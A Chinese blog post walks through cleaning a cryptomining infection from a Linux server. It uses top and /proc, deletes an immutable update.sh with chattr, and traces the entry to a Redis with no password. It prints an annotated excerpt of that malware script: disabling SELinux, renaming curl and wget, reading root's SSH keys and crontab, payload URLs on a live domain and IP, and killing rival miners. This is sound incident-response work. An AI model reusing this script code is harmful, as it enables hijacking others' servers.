linux cpu100%占用排查解决

挖矿病毒

排查

今天上线发现linux cpu飙升到100%

输入 top -c 命令找到占用 CPU 最高的进程

top -c

 

 

2. 使用 kill -9 后，几秒钟后进程又起来了

3.输入命令

ls -l /proc/{pid号}/exe

 

 

 4. 我们进入etc目录下面看看

 5.发现里面有个update.sh脚本文件 打开看看

# Annotated excerpt of the malicious update.sh found on the host, reproduced as
# pasted (the file itself is much longer; only its beginning is shown here).
# NOTE(review): line as pasted — presumably `setenforce 0 2>/dev/null` with
# characters lost in the copy; as written it neither finds the command nor
# reaches /dev/null. Intent: put SELinux into permissive mode for this session.
etenforce 0 2>dev/null
# Persistently disables SELinux from the next boot by overwriting its config.
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
# Flushes dirty pages and drops the page cache (presumably to free memory).
sync && echo 3 >/proc/sys/vm/drop_caches
# Reads the current user's crontab file and root's authorized_keys into
# variables; what is done with them is outside this excerpt, but both files are
# persistence points that must be inspected during cleanup.
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
# Marker file written by the script; its path is kept in rtdir.
echo 1 > /etc/sysupdates
rtdir="/etc/sysupdates"
# Paths of the system downloaders and of the renamed copies the script uses
# instead of them.
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cur"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wge"
# Renames wget -> wge and curl -> cur through intermediate names (the xget/xurl
# moves presumably pick up copies left by an earlier run). Effect: the usual
# downloader names no longer work for operators and other tooling, while the
# script keeps working copies under the new names.
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/xget /usr/bin/get
mv /usr/bin/get /usr/bin/wge
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/xurl /usr/bin/url
mv /usr/bin/url /usr/bin/cur
# Payload locations: a primary domain with an IP-based fallback for each
# component, plus expected file sizes (presumably used to validate downloads).
# The domain and the IP below are the network indicators of this infection;
# the component names (miner, this script, config, "networkservice" scanner,
# "sysguard" watchdog) follow from the variable names.
miner_url="https://de.gsearch.com.de/api/sysupdate"
miner_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysupdate"
miner_size="1102480"
sh_url="https://de.gsearch.com.de/api/update.sh"
sh_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/update.sh"
config_url="https://de.gsearch.com.de/api/config.json"
config_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/config.json"
config_size="3356"
scan_url="https://de.gsearch.com.de/api/networkservice"
scan_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/networkservice"
scan_size="2584072"
watchdog_url="https://de.gsearch.com.de/api/sysguard"
watchdog_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysguard"
watchdog_size="1929480"

kill_miner_proc()
{
    ps auxf|grep kinsing| awk '{print $2}'|xargs kill -9
    ps auxf|grep kdevtmpfsi| awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
    ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9
    ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9
    ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
    ps ax|grep -o './[0-9]* -c'| xargs pkill -f
        ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
        ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
        ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 %
    pkill -f biosetjenkins
    pkill -f Loopback
"update.sh" [readonly] 961L, 37659C

6.看不懂 试着在百度搜了一下这个地址

https://de.gsearch.com.de/api/sysupdate

 

6.确定这个就是那个自启动挖矿脚本 删除

rm -rf  update.sh

 

 tmd发现没权限删除

7.使用lsattr chattr2个命令

# Clear the immutable attribute the malware set, then remove the file.
lsattr update.sh # the 'i' (immutable) attribute is set, so it has to be cleared before deletion
chattr -i update.sh
rm -rf update.sh # deletion now succeeds

8.杀掉进程

kill -9 13586

9. 用同样的步骤删除 networkservice

 

分析如何中毒的

1.安装了redis打开了端口外网访问。但是并没有设置密码

2.top找到redis进程和安装目录

 

 

cd /proc/5913
ll

 

 

设置密码可参考

https://blog.csdn.net/qq_26440803/article/details/82967433 

3.关闭端口任意机器可访问 限制指定机器ip

第二次杀毒

以为昨晚做了上面这些就万事大吉，结果没一会儿又出现了。上面的脚本会读取 crontab 和 /root/.ssh/authorized_keys，持久化入口很可能还留在定时任务或 SSH 密钥里，需要一并检查。参考博文:https://www.cnblogs.com/brishenzhou/p/11770478.html

 
